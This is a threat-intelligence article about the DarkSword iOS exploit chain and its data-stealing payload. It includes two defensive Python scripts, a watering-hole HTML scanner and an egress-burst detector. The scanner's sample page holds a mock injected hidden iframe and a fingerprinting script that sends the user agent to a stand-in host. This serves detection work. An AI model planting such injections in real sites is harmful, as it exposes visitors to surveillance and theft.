
DarkSword iOS Exploit Kit Enables Full Device Takeover Using Zero-Day Chain

A sophisticated iOS exploit kit uses six vulnerabilities, including three zero-days, to silently steal data within minutes.

A newly uncovered iOS exploit kit, DarkSword, is raising serious concerns across the cybersecurity landscape. Unlike most mobile threats, which rely on a malicious app or a link the victim must act on, this toolkit achieves full device compromise with no interaction beyond loading a web page, making it one of the most advanced iPhone attack chains observed in recent months.

According to threat intelligence findings, multiple actors—including suspected state-linked groups and commercial surveillance vendors—have actively deployed DarkSword since late 2025. The campaigns have targeted users across regions such as Saudi Arabia, Turkey, Malaysia, and Ukraine. Meanwhile, its use alongside another exploit kit, Coruna, signals a rapid expansion of high-end mobile exploitation capabilities.

How the Attack Works

DarkSword operates through a watering hole attack technique, where attackers compromise legitimate websites and inject malicious scripts. When a user visits the infected site via Safari, the exploit chain activates automatically.

The attack unfolds in stages:

  • First, a hidden iframe loads JavaScript that fingerprints the device and iOS version, so the kit can serve the chain matching that build
  • Then, the exploit chain leverages multiple vulnerabilities to achieve code execution inside Safari’s sandboxed content process
  • Next, it escapes Apple’s sandbox protections using GPU and system-level processes
  • Finally, it gains kernel-level access, enabling complete control over the device

As a result, attackers can deploy a data-harvesting malware known as GHOSTBLADE, which operates with elevated privileges.
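As an added illustration (not code from the report or from any vendor tool), the Python script below scans a page’s HTML for the two traits the staging step relies on: an iframe hidden from the user, and inline JavaScript that probes navigator.userAgent or navigator.platform. The sample page, the hostname stage.example.invalid and the probe list are constructed for the example; a real watering-hole check would run it against a crawl of the sites a fleet actually visits.

```python
"""Flag watering-hole style injections in a page's HTML.

Added example, not the original report's code or any vendor tool. It
looks for a hidden <iframe> and for inline JavaScript that fingerprints
the browser. The sample page below is constructed for the example.
"""
import re
from html.parser import HTMLParser

# Constructed sample page: an ordinary article with an injected hidden
# iframe and a fingerprinting script (hypothetical host stage.example.invalid).
SAMPLE_HTML = """
<html><head><title>Local news</title>
<script src="/static/app.js"></script></head>
<body>
<h1>Weather update</h1>
<p>Cloudy with a chance of rain.</p>
<iframe src="/ads/banner" width="300" height="250"></iframe>
<iframe src="https://stage.example.invalid/x" style="display:none;width:0;height:0"></iframe>
<script>
var ua = navigator.userAgent;
if (ua.indexOf("iPhone OS") !== -1 && navigator.platform === "iPhone") {
  location.href = "https://stage.example.invalid/c?ua=" + encodeURIComponent(ua);
}
</script>
</body></html>
"""

# Inline styles that hide an element from the user.
HIDDEN_STYLE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|(?:width|height)\s*:\s*0(?:px)?\b", re.I)
# Browser/device probes typical of exploit-kit gating scripts (assumed list).
FINGERPRINT_PROBES = ("navigator.userAgent", "navigator.platform",
                      "navigator.vendor", "navigator.maxTouchPoints", "screen.width")


class InjectionScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []
        self._inline_script = None  # text chunks while inside <script> without src

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)  # bare attributes (e.g. "hidden") map to None
        if tag == "iframe":
            zero_size = a.get("width") in ("0", "0px") or a.get("height") in ("0", "0px")
            if zero_size or "hidden" in a or HIDDEN_STYLE.search(a.get("style") or ""):
                self.findings.append(("hidden_iframe", a.get("src") or ""))
        elif tag == "script" and "src" not in a:
            self._inline_script = []  # only inline bodies are inspected here

    def handle_data(self, data):
        if self._inline_script is not None:
            self._inline_script.append(data)  # script text may arrive in chunks

    def handle_endtag(self, tag):
        if tag == "script" and self._inline_script is not None:
            body = "".join(self._inline_script)
            self._inline_script = None
            hits = [p for p in FINGERPRINT_PROBES if p in body]
            if hits:
                self.findings.append(("fingerprint_script", ",".join(hits)))


def scan_html(html):
    """Return a list of (finding_type, detail) tuples for one page."""
    scanner = InjectionScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


if __name__ == "__main__":
    for kind, detail in scan_html(SAMPLE_HTML):
        print(f"{kind}: {detail}")
```

The scanner only inspects inline script bodies; an external script served from an attacker-controlled host would need to be fetched and run through the same probe check, and a legitimate analytics library will also touch navigator.userAgent, so a hit is a triage signal rather than a verdict.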

Zero-Day Exploitation at Scale

What makes DarkSword particularly dangerous is its use of six vulnerabilities, including three zero-days that were actively exploited before Apple released patches.

These vulnerabilities affect key components such as:

  • JavaScriptCore (the JavaScript engine inside Safari’s WebKit)
  • iOS kernel memory management
  • GPU and system-level processes

Because three of the bugs were exploited before fixes existed, even a fully patched device was exposed during that window, and once Apple ships the fixes, any delay in installing them keeps the device exposed. This highlights the growing sophistication of exploit chains that combine multiple weaknesses into a seamless attack.

What Data Is Being Stolen

Once the device is compromised, DarkSword quickly extracts a wide range of sensitive data, including:

  • Credentials and saved passwords
  • Cryptocurrency wallet and exchange data
  • Messages (SMS, WhatsApp, Telegram)
  • Emails, contacts, and call history
  • Photos, files, and iCloud data
  • Location history and Wi-Fi credentials

Notably, the malware follows a “hit-and-run” approach: it collects and exfiltrates data within minutes and then cleans up its traces, reducing the chances of detection and leaving little behind for forensic examination.
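A collect-and-leave implant gives a defender little on the device, but the exfiltration itself still has to cross the network. As an added example (not the report’s or any vendor’s detection logic), the Python below applies the one heuristic that pattern suggests: a burst of outbound bytes from a mobile device to a host absent from the fleet’s baseline, inside a short window. The egress records, hostnames and baseline are constructed for the example, and the 5 MB / 5 minute thresholds are assumed starting values to tune against real traffic.

```python
"""Spot a short outbound burst to an unfamiliar host from a mobile device.

Added example, not the original report's or any vendor's detection logic.
Records must be in timestamp order. Log lines, hostnames and the baseline
below are constructed for the example.
"""
from collections import defaultdict, deque
from datetime import datetime

# Constructed egress records: "<iso timestamp> <device> <dst host> <bytes_out>"
SAMPLE_LOG = """\
2026-03-01T10:00:05Z iphone-12 news.example.org 1200
2026-03-01T10:00:06Z iphone-12 cdn.example.org 900
2026-03-01T10:00:40Z iphone-12 upload.example.invalid 1400000
2026-03-01T10:01:10Z iphone-12 upload.example.invalid 2100000
2026-03-01T10:02:30Z iphone-12 upload.example.invalid 2800000
2026-03-01T10:05:00Z iphone-12 news.example.org 800
2026-03-01T10:10:00Z iphone-03 mirror.example.invalid 3000000
2026-03-01T10:20:00Z iphone-03 mirror.example.invalid 3000000
2026-03-01T11:00:00Z iphone-07 icloud.example.org 9000000
"""

# Hosts this fleet is already known to talk to (constructed baseline; in
# practice built from weeks of prior egress history).
KNOWN_HOSTS = {"news.example.org", "cdn.example.org", "icloud.example.org"}


def parse_line(line):
    ts, device, host, nbytes = line.split()
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), device, host, int(nbytes)


def detect_bursts(log_text, known_hosts, window_s=300, threshold_bytes=5_000_000):
    """Return alerts as (device, host, bytes_in_window, first_ts, last_ts).

    A sliding window per (device, host) sums bytes_out over the last
    window_s seconds; an alert fires the first time that sum reaches
    threshold_bytes for a host outside known_hosts.
    """
    windows = defaultdict(deque)  # (device, host) -> deque of (ts, bytes)
    totals = defaultdict(int)
    alerted = set()
    alerts = []
    for line in log_text.strip().splitlines():
        ts, device, host, nbytes = parse_line(line)
        if host in known_hosts:
            continue  # baseline traffic, e.g. cloud backup, never alerts
        key = (device, host)
        q = windows[key]
        q.append((ts, nbytes))
        totals[key] += nbytes
        # Drop records that have fallen out of the window.
        while (ts - q[0][0]).total_seconds() > window_s:
            _, old = q.popleft()
            totals[key] -= old
        if totals[key] >= threshold_bytes and key not in alerted:
            alerted.add(key)
            alerts.append((device, host, totals[key],
                           q[0][0].isoformat(), ts.isoformat()))
    return alerts


if __name__ == "__main__":
    for alert in detect_bursts(SAMPLE_LOG, KNOWN_HOSTS):
        print("burst:", alert)
```

In the sample, iphone-12 pushes 6.3 MB to an unknown host in under two minutes and is flagged; iphone-03 sends the same volume split across ten minutes and is not, and iphone-07’s large upload to a baseline host is ignored. Whatever the thresholds, the baseline is the part that matters: a new destination plus a volume the device never produces in normal use is the signal, not volume alone.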

Why This Threat Is Different

Unlike traditional spyware that maintains long-term persistence, DarkSword focuses on speed and stealth. This shift indicates a new trend where attackers prioritize rapid monetization and intelligence gathering over prolonged surveillance.

Additionally, the exploit kit appears to be part of a growing underground market for advanced mobile exploits. This means even less sophisticated actors can now access powerful tools once reserved for elite nation-state operations.

Business & Security Implications

From a business perspective, this development introduces critical risks:

  • Mobile devices are now primary attack surfaces, especially for executives and remote workers
  • Zero-day exploit chains reduce the effectiveness of traditional security controls
  • Financial and crypto-related data theft is becoming a key attacker objective

Therefore, organizations in the UAE and globally must rethink mobile security strategies, focusing on prompt installation of iOS updates, monitoring of mobile device and network activity, and threat intelligence integration.

What Happens Next

The emergence of DarkSword, alongside similar exploit kits, suggests a future where:

  • Mobile zero-day markets continue to expand
  • Attack chains become more modular and reusable
  • Financially motivated actors gain access to nation-state-grade capabilities

As a result, the line between cybercrime and cyber-espionage continues to blur.